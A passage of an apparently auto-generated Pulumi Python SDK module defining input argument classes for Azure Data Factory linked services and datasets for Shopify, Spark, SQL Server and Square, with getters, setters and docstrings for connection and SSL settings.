@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class ShopifyObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Shopify Service dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'ShopifyObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class SparkLinkedServiceArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
host: Any,
port: Any,
type: pulumi.Input[str],
allow_host_name_cn_mismatch: Optional[Any] = None,
allow_self_signed_server_cert: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enable_ssl: Optional[Any] = None,
encrypted_credential: Optional[Any] = None,
http_path: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
server_type: Optional[pulumi.Input[str]] = None,
thrift_transport_protocol: Optional[pulumi.Input[str]] = None,
trusted_cert_path: Optional[Any] = None,
use_system_trust_store: Optional[Any] = None,
username: Optional[Any] = None):
"""
Spark Server linked service.
:param pulumi.Input[str] authentication_type: The authentication method used to access the Spark server.
:param Any host: IP address or host name of the Spark server.
:param Any port: The TCP port that the Spark server uses to listen for client connections.
:param pulumi.Input[str] type: Type of linked service.
:param Any allow_host_name_cn_mismatch: Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
:param Any allow_self_signed_server_cert: Specifies whether to allow self-signed certificates from the server. The default value is false.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any enable_ssl: Specifies whether the connections to the server are encrypted using SSL. The default value is false.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param Any http_path: The partial URL corresponding to the Spark server.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password corresponding to the user name that you provided in the Username field.
:param pulumi.Input[str] server_type: The type of Spark server.
:param pulumi.Input[str] thrift_transport_protocol: The transport protocol to use in the Thrift layer.
:param Any trusted_cert_path: The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
:param Any use_system_trust_store: Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
:param Any username: The user name that you use to access Spark Server.
"""
pulumi.set(__self__, "authentication_type", authentication_type)
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "port", port)
pulumi.set(__self__, "type", 'Spark')
if allow_host_name_cn_mismatch is not None:
pulumi.set(__self__, "allow_host_name_cn_mismatch", allow_host_name_cn_mismatch)
if allow_self_signed_server_cert is not None:
pulumi.set(__self__, "allow_self_signed_server_cert", allow_self_signed_server_cert)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_ssl is not None:
pulumi.set(__self__, "enable_ssl", enable_ssl)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if http_path is not None:
pulumi.set(__self__, "http_path", http_path)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if server_type is not None:
pulumi.set(__self__, "server_type", server_type)
if thrift_transport_protocol is not None:
pulumi.set(__self__, "thrift_transport_protocol", thrift_transport_protocol)
if trusted_cert_path is not None:
pulumi.set(__self__, "trusted_cert_path", trusted_cert_path)
if use_system_trust_store is not None:
pulumi.set(__self__, "use_system_trust_store", use_system_trust_store)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
The authentication method used to access the Spark server.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def host(self) -> Any:
"""
IP address or host name of the Spark server.
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def port(self) -> Any:
"""
The TCP port that the Spark server uses to listen for client connections.
"""
return pulumi.get(self, "port")
@port.setter
def port(self, value: Any):
pulumi.set(self, "port", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="allowHostNameCNMismatch")
def allow_host_name_cn_mismatch(self) -> Optional[Any]:
"""
Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
"""
return pulumi.get(self, "allow_host_name_cn_mismatch")
@allow_host_name_cn_mismatch.setter
def allow_host_name_cn_mismatch(self, value: Optional[Any]):
pulumi.set(self, "allow_host_name_cn_mismatch", value)
@property
@pulumi.getter(name="allowSelfSignedServerCert")
def allow_self_signed_server_cert(self) -> Optional[Any]:
"""
Specifies whether to allow self-signed certificates from the server. The default value is false.
"""
return pulumi.get(self, "allow_self_signed_server_cert")
@allow_self_signed_server_cert.setter
def allow_self_signed_server_cert(self, value: Optional[Any]):
pulumi.set(self, "allow_self_signed_server_cert", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="enableSsl")
def enable_ssl(self) -> Optional[Any]:
"""
Specifies whether the connections to the server are encrypted using SSL. The default value is false.
"""
return pulumi.get(self, "enable_ssl")
@enable_ssl.setter
def enable_ssl(self, value: Optional[Any]):
pulumi.set(self, "enable_ssl", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter(name="httpPath")
def http_path(self) -> Optional[Any]:
"""
The partial URL corresponding to the Spark server.
"""
return pulumi.get(self, "http_path")
@http_path.setter
def http_path(self, value: Optional[Any]):
pulumi.set(self, "http_path", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The password corresponding to the user name that you provided in the Username field.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="serverType")
def server_type(self) -> Optional[pulumi.Input[str]]:
"""
The type of Spark server.
"""
return pulumi.get(self, "server_type")
@server_type.setter
def server_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_type", value)
@property
@pulumi.getter(name="thriftTransportProtocol")
def thrift_transport_protocol(self) -> Optional[pulumi.Input[str]]:
"""
The transport protocol to use in the Thrift layer.
"""
return pulumi.get(self, "thrift_transport_protocol")
@thrift_transport_protocol.setter
def thrift_transport_protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "thrift_transport_protocol", value)
@property
@pulumi.getter(name="trustedCertPath")
def trusted_cert_path(self) -> Optional[Any]:
"""
The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
"""
return pulumi.get(self, "trusted_cert_path")
@trusted_cert_path.setter
def trusted_cert_path(self, value: Optional[Any]):
pulumi.set(self, "trusted_cert_path", value)
@property
@pulumi.getter(name="useSystemTrustStore")
def use_system_trust_store(self) -> Optional[Any]:
"""
Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
"""
return pulumi.get(self, "use_system_trust_store")
@use_system_trust_store.setter
def use_system_trust_store(self, value: Optional[Any]):
pulumi.set(self, "use_system_trust_store", value)
@property
@pulumi.getter
def username(self) -> Optional[Any]:
"""
The user name that you use to access Spark Server.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Optional[Any]):
pulumi.set(self, "username", value)
@pulumi.input_type
class SparkObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Spark Server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'SparkObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class SqlServerLinkedServiceArgs:
def __init__(__self__, *,
connection_string: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
user_name: Optional[Any] = None):
"""
SQL Server linked service.
:param Any connection_string: The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The on-premises Windows authentication password.
:param Any user_name: The on-premises Windows authentication user name. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "connection_string", connection_string)
pulumi.set(__self__, "type", 'SqlServer')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Any:
"""
The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Any):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The on-premises Windows authentication password.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[Any]:
"""
The on-premises Windows authentication user name. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[Any]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class SqlServerTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
table_name: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The on-premises SQL Server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param Any table_name: The table name of the SQL Server dataset. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "table_name", table_name)
pulumi.set(__self__, "type", 'SqlServerTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter(name="tableName")
def table_name(self) -> Any:
"""
The table name of the SQL Server dataset. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "table_name")
@table_name.setter
def table_name(self, value: Any):
pulumi.set(self, "table_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class SquareLinkedServiceArgs:
def __init__(__self__, *,
client_id: Any,
host: Any,
redirect_uri: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
client_secret: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Square Service linked service.
:param Any client_id: The client ID associated with your Square application.
:param Any host: The URL of the Square instance (e.g. mystore.mysquare.com).
:param Any redirect_uri: The redirect URL assigned in the Square application dashboard (e.g. http://localhost:2500).
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] client_secret: The client secret associated with your Square application.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "client_id", client_id)
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "redirect_uri", redirect_uri)
pulumi.set(__self__, "type", 'Square')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if client_secret is not None:
pulumi.set(__self__, "client_secret", client_secret)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Any:
"""
The client ID associated with your Square application.
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Any):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter
def host(self) -> Any:
"""
The URL of the Square instance (e.g. mystore.mysquare.com).
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter(name="redirectUri")
def redirect_uri(self) -> Any:
"""
The redirect URL assigned in the Square application dashboard (e.g. http://localhost:2500).
"""
return pulumi.get(self, "redirect_uri")
@redirect_uri.setter
def redirect_uri(self, value: Any):
pulumi.set(self, "redirect_uri", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The client secret associated with your Square application.
"""
return pulumi.get(self, "client_secret")
@client_secret.setter
def client_secret(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "client_secret", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
